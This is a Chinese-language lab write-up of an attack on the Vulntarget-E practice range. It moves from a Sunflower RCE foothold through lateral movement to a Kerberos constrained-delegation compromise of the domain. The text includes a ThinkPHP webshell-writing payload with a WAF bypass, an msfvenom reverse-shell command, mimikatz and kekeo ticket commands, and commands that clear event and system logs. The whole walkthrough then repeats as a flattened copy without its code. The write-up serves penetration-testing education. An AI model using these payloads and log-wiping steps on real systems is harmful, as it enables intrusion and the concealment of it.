vulntarget-e打靶记录
字数 1585 2025-08-12 11:34:21

Vulntarget-E 靶机渗透测试教学文档

1. 信息收集阶段

1.1 初始扫描

  • 使用nmap绕过防火墙扫描:nmap -d参数可绕过简单防火墙
  • 发现开放49773端口,识别为向日葵服务

1.2 漏洞利用

  • 利用向日葵远程RCE漏洞执行命令
  • 初步尝试PowerShell木马上线失败(被杀软拦截)

1.3 杀软绕过

  • 使用tasklist /svc识别杀软类型
  • 制作免杀木马并成功上线,获得system权限

2. 内网信息收集

2.1 网络拓扑发现

  • arp -a发现存在100网段(192.168.100.131)
  • 确认无域环境

2.2 敏感信息获取

  • 桌面发现"需要测试的地址.txt"文件,内含多个域名
  • 使用火狐浏览器历史记录提取潜在URL路径

3. 横向移动 - 100网段

3.1 主机扫描

  • 使用kscan工具绕过防火墙扫描192.168.100.131
  • 发现开放8888(宝塔面板)和80端口

3.2 Host碰撞技术

  • 利用之前获取的域名列表进行Host碰撞
  • 使用Modheader插件添加Host头访问

3.3 ThinkPHP漏洞利用

  • 发现ThinkPHP 5.0框架
  • 使用三次URL编码绕过宝塔WAF写入Webshell:
http://192.168.100.131/vulntarget/public/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][0]=../../2.php&vars[1][1]=%3C?php%20eval(urldecode(urldecode(urldecode($_REQUEST[cmd]))));?%3E

3.4 绕过disable_functions

  • 使用php7-gc-bypass绕过限制:
    https://github.com/mm0r1/exploits/blob/master/php7-gc-bypass/exploit.php

3.5 Linux主机渗透

  • 发现/home目录下存在SSH密钥
  • 使用密钥连接SSH(root权限)
  • 关闭防火墙:ufw disable
  • 使用msfvenom生成Linux木马:
    msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.100.155 LPORT=1110 -f elf > shell155.elf

4. 横向移动 - 88网段

4.1 扫描发现

  • 发现192.168.88.102开放1433(MSSQL)、445(SMB)等端口

4.2 密码爆破

  • 获取MSSQL凭据:test:123.com
  • 获取主机凭据:administrator:admin@123

4.3 横向移动

  • 使用msf的psexec模块进行横向攻击

5. 域渗透

5.1 域环境确认

  • 发现10网段(192.168.10.10)为域控
  • 域名为vulntarget.com

5.2 约束性委派攻击

  1. 使用AdFind查找约束委派服务:
AdFind.exe -h 192.168.88.102 -u win2008 -up qweASD123 -b "DC=nami,DC=com" -f "(&(samAccountType=805306368)(msds-allowedtodelegateto=*))" cn distinguishedName msds-allowedtodelegateto
  1. 使用kekeo请求票据:
tgt::ask /user:win2008 /domain:vulntarget.com /password:qweASD123 /ticket:ash.kirbi
tgs::s4u /tgt:TGT_win2008@VULNTARGET.COM_krbtgt~vulntarget.com@VULNTARGET.COM.kirbi /user:Administrator@vulntarget.com /service:cifs/WIN-1PV25H8UJPN.vulntarget.com
  1. 使用mimikatz注入票据:
kerberos::ptt TGS_Administrator@vulntarget.com@VULNTARGET.COM_cifs~WIN-1PV25H8UJPN.vulntarget.com@VULNTARGET.COM.kirbi

6. 权限维持技术

6.1 Windows权限维持

  • 注册表自启动
  • 黄金票据
  • SSP注入
  • DSRM后门

6.2 Linux权限维持

  • 定时任务
  • SSH密钥后门

7. 痕迹清理

7.1 Windows清理

wevtutil el  # 列出所有日志
wevtutil cl system  # 清理系统日志
wevtutil cl application  # 清理应用程序日志
wevtutil cl security  # 清理安全日志

7.2 Linux清理

echo > /var/log/lastlog  # 清除登录记录
echo > /var/log/utmp  # 清除当前登录信息
cat /dev/null > /var/log/secure  # 清除安全日志
cat /dev/null > /var/log/message  # 清除系统日志

8. 工具清单

  • nmap:端口扫描
  • kscan:Go编写的防火墙绕过扫描工具
  • Ladon:快速搭建Web服务
  • AdFind:域信息查询
  • kekeo:Kerberos票据工具
  • mimikatz:凭证提取与票据操作
  • msfvenom:Payload生成
  • Modheader:浏览器Header修改插件

9. 关键知识点总结

  1. 防火墙绕过技术:nmap -d参数、kscan工具
  2. Webshell绕过技巧:三次URL编码
  3. disable_functions绕过方法:php7-gc-bypass
  4. 内网Host碰撞技术
  5. 约束性委派攻击流程
  6. 跨平台权限维持方法
  7. 全面的日志清理方案

通过此渗透测试过程,展示了从外网到内网、从Windows到Linux、从工作组到域环境的完整攻击链,涵盖了现代企业网络中常见的安全漏洞和攻击手法。

Vulntarget-E 靶机渗透测试教学文档 1. 信息收集阶段 1.1 初始扫描 使用nmap绕过防火墙扫描: nmap -d 参数可绕过简单防火墙 发现开放49773端口,识别为向日葵服务 1.2 漏洞利用 利用向日葵远程RCE漏洞执行命令 初步尝试PowerShell木马上线失败(被杀软拦截) 1.3 杀软绕过 使用 tasklist /svc 识别杀软类型 制作免杀木马并成功上线,获得system权限 2. 内网信息收集 2.1 网络拓扑发现 arp -a 发现存在100网段(192.168.100.131) 确认无域环境 2.2 敏感信息获取 桌面发现"需要测试的地址.txt"文件,内含多个域名 使用火狐浏览器历史记录提取潜在URL路径 3. 横向移动 - 100网段 3.1 主机扫描 使用kscan工具绕过防火墙扫描192.168.100.131 发现开放8888(宝塔面板)和80端口 3.2 Host碰撞技术 利用之前获取的域名列表进行Host碰撞 使用Modheader插件添加Host头访问 3.3 ThinkPHP漏洞利用 发现ThinkPHP 5.0框架 使用三次URL编码绕过宝塔WAF写入Webshell: 3.4 绕过disable_ functions 使用php7-gc-bypass绕过限制: https://github.com/mm0r1/exploits/blob/master/php7-gc-bypass/exploit.php 3.5 Linux主机渗透 发现/home目录下存在SSH密钥 使用密钥连接SSH(root权限) 关闭防火墙: ufw disable 使用msfvenom生成Linux木马: msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.100.155 LPORT=1110 -f elf > shell155.elf 4. 横向移动 - 88网段 4.1 扫描发现 发现192.168.88.102开放1433(MSSQL)、445(SMB)等端口 4.2 密码爆破 获取MSSQL凭据:test:123.com 获取主机凭据:administrator:admin@123 4.3 横向移动 使用msf的psexec模块进行横向攻击 5. 域渗透 5.1 域环境确认 发现10网段(192.168.10.10)为域控 域名为vulntarget.com 5.2 约束性委派攻击 使用AdFind查找约束委派服务: 使用kekeo请求票据: 使用mimikatz注入票据: 6. 权限维持技术 6.1 Windows权限维持 注册表自启动 黄金票据 SSP注入 DSRM后门 6.2 Linux权限维持 定时任务 SSH密钥后门 7. 痕迹清理 7.1 Windows清理 7.2 Linux清理 8. 工具清单 nmap:端口扫描 kscan:Go编写的防火墙绕过扫描工具 Ladon:快速搭建Web服务 AdFind:域信息查询 kekeo:Kerberos票据工具 mimikatz:凭证提取与票据操作 msfvenom:Payload生成 Modheader:浏览器Header修改插件 9. 关键知识点总结 防火墙绕过技术:nmap -d参数、kscan工具 Webshell绕过技巧:三次URL编码 disable_ functions绕过方法:php7-gc-bypass 内网Host碰撞技术 约束性委派攻击流程 跨平台权限维持方法 全面的日志清理方案 通过此渗透测试过程,展示了从外网到内网、从Windows到Linux、从工作组到域环境的完整攻击链,涵盖了现代企业网络中常见的安全漏洞和攻击手法。